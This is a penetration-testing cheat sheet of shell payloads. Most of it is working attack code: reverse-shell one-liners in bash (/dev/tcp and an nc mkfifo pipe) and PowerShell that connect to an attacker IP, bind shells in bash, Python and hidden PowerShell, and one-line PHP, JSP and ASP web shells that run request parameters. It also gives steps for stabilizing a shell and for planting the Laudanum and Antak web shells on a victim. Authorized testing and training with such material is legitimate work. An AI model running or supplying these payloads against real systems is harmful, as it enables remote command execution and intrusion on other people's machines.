Reverse Shells + Bind + Web

Listen

  • Typical netcat

    • -l listen

    • -v verbose

    • -n No DNs resolution

    • -p <port> port

Payloads

More at PayloadAllTheThings

Also at HighOn.Coffee

great one: https://www.revshells.com/

Bash

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Sanitization/Stabilization/Upgrading TTY

After connecting, often the shell is unstable and can be weird to use.

python -c 'import pty; pty.spawn("/bin/bash")'

Then CTRL + Z to go back to local shell

stty raw -echo
fg

Then we should have a stable shell but not using all screen.

On a local shell:

echo $TERM
stty size

On remote shell:

export TERM=<Output of above>
stty rows <first> columns <second>

Bind Shell

Bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Python

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Web shell

This is also covered in File Inclusion

PHP

<?php system($_REQUEST["cmd"]); ?>

JSP

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP

<% eval request("cmd") %>

Default webroots:

ASP shells

Laudanum, One Webshell to Rule Them All

You can get it here. Laudanum is built into Parrot OS and Kali by default.

The Laudanum files can be found in the /usr/share/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your attacking host IP address

cp /usr/share/laudanum/aspx/shell.aspx ~/demo.aspx

Add your IP address to the allowedIps variable on line 59.

Antak Webshell

Antak is a web shell built-in ASP.Net included within the Nishang project. Nishang is an Offensive PowerShell toolset that can provide options for any portion of your pentest.

git clone https://github.com/samratashok/nishang.git
cp nishang/Antak-WebShell/antak.aspx ~/Upload.aspx

Modify the file

PHP Shells

WhiteWinterWolf

Considerations when Dealing with Web Shells

When utilizing web shells, consider the below potential issues that may arise during your penetration testing process:

  • Web applications sometimes automatically delete files after a pre-defined period

  • Limited interactivity with the operating system in terms of navigating the file system, downloading and uploading files, chaining commands together may not work (ex. whoami && hostname), slowing progress, especially when performing enumeration -Potential instability through a non-interactive web shell

  • Greater chance of leaving behind proof that we were successful in our attack

Also, we must document every method we attempt, what worked & what did not work, and even the names of the payloads & files we tried to use. We could include a sha1sum or MD5 hash of the file name, upload locations in our reports as proof, and provide attribution.

Last updated